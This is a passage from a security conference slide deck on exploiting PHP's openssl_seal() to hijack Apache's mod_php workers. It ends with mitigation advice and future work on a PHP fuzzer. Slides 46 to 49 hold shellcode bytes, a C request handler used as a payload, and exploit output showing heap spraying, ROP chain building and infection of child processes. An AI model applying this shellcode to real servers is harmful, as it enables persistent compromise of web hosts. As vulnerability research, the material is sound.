        ap_hook_quick_handler_addr(handler_space, NULL, NULL, APR_HOOK_REALLY_FIRST);
    }
  • 46. openssl_seal() - shellcode - handler
    #define APR_HOOK_REALLY_FIRST (-10)
    #define OK (0)

    int handler(void *r)
    {
        void (*ap_rprintf_addr)(char *, void *) = (void *)0xdead;
        char content[16] = "hello world";

        (ap_rprintf_addr)(r, content);
        return OK;
    }
  • 47. openssl_seal() - how to survive
    PHP has a mechanism that kills scripts that run for too long; it is based on signals.
    If we deliver the SIGPROF signal to the process, PHP will take care of recovering our victim for us.
    $shellcode_stage1 = str_repeat("\x90",512) .
        "\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
        "\x49\xb8" . pack('P', 0x1000) .                // handler size
        "\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
        "\x48\xba" . pack('P', $ap_hook_handler_addr) . // movabs ap_hook_quick_handler, %rdx
        "\x48\xbe" . pack('P', 0) .                     // UNUSED
        "\x48\xbf" . pack('P', $mmap_addr) .            // movabs mmap,%rdi
        "\xff\xd0" .                                    // callq %rax
        "\xb8\x27\x00\x00\x00" .                        // mov $0x27,%eax - getpid syscall
        "\x0f\x05" .                                    // syscall
        "\xbe\x1b\x00\x00\x00" .                        // mov $0x1b,%esi - SIGPROF
        "\x89\xc7" .                                    // mov %eax,%edi - pid
        "\xb8\x3e\x00\x00\x00" .                        // mov $0x3e,%eax - kill syscall
        "\x0f\x05";                                     // syscall
  • 48. openssl_seal() - pwning apache2handler
    $ curl http://localhost:10080/~rj4/exp.php
    [+] buffer string @ 0x7f3d66c00014
    [+] faking EVP_PKEY @ 0x7f3d66c00113
    [+] faking ASN @ 0x7f3d66c00113
    [...]
    [+] mmap @ 0x7f3d763c49c0
    [+] apache2 base @ 0x7f3d77180000
    [+] ap_rprintf @ 0x7f3d771c29c0
    [+] ap_hook_quick_handler @ 0x7f3d771d6c00
    [+] building ropchain
    [+] spraying heap
    [+] triggering openssl_seal()... execute it a few times to infect all children
  • 49. openssl_seal() - pwning apache2handler - result
    source: https://marinasleeps.files.wordpress.com/
    $ curl http://localhost:10080/~rj4/exp.php
    Hello World!
    $ curl http://localhost:10080/whatever
    Hello World!
  • 50. Why should I care?
    source: http://www.badideatshirts.com/
    apache2 + mod_php is a quite popular configuration (more than 650 thousand servers according to a shodan.io search)
    this attack vector can be used to bypass disabled functions (easier methods exist, it's just another one)
    running buggy software is risky
    there are other bugs...
  • 51. What can I do?
    source: http://cdn.quotesgram.com/
    keep your software up to date
    unload unnecessary extensions
    do not rely on disabled functions
    do not rely on open_basedir
    do not run PHP as mod_php
    do not trust your software
  • 52. Future work
    port Minerva to any language → Minerva$lang
    code coverage improvement
    for now we ignore the fact that PHP is an object-oriented language
    generate language constructs
    variables mutation
    test case minimization
    use code coverage as input to the fuzzer (like in AFL or autodafe)
    implement type casts
    implement mocks for some backends
    ...your ideas.
  • 53. Credits Large parts of this presentation were done in cooperation with Marek Kroemeke and Filip Palian, THANKS!
  • 55. Time for questions (and maybe answers)
    Q&A
    m.kocielski@logicaltrust.net
    http://akat1.pl/
    @akat1_pl